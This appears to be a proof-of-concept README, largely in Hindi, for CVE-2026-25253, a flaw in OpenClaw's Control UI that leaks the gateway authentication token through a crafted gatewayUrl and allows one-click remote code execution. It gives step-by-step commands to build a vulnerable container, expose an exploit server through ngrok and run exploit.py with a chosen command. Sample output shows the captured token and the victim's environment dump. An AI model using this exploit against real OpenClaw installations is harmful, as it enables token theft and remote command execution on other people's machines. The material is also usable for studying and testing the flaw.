
OpenClaw Authentication Token Exfiltration
★ CVE-2026-25253 OpenClaw 1-क्लिक रिमोट कोड एक्जीक्यूशन PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : OpenClaw प्रमाणीकरण टोकन एक्सफ़िल्ट्रेशन भेद्यता
विवरण: OpenClaw (उर्फ clawdbot या Moltbot) v2026.1.29 से पहले के संस्करण में हमलावरों को एक निर्मित gatewayUrl क्वेरी-स्ट्रिंग मान Control UI में प्रदान करके संग्रहीत गेटवे प्रमाणीकरण टोकन को बाहर निकालने की अनुमति देता है, जो बिना सत्यापन या उपयोगकर्ता पुष्टि के स्वचालित रूप से एक WebSocket कनेक्शन स्थापित करता है। इससे अनधिकृत गेटवे पहुंच और 1-क्लिक रिमोट कोड निष्पादन हो सकता है।
Dockerfile — OpenClaw असुरक्षित वातावरण बनाएंtemplates/ — एक्सप्लॉइट द्वारा उपयोग किए जाने वाले दुर्भावनापूर्ण वेब पेजconfig.txt — पीड़ित वातावरण में उपयोग किया जाने वाला OpenClaw कॉन्फ़िगरेशनexploit.py — एक्सप्लॉइट सर्वरrequirements.txt — PoC निर्भरताएँdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 दर्ज करेंconfig.txt की सामग्री चिपकाएंpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
उदाहरण:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें।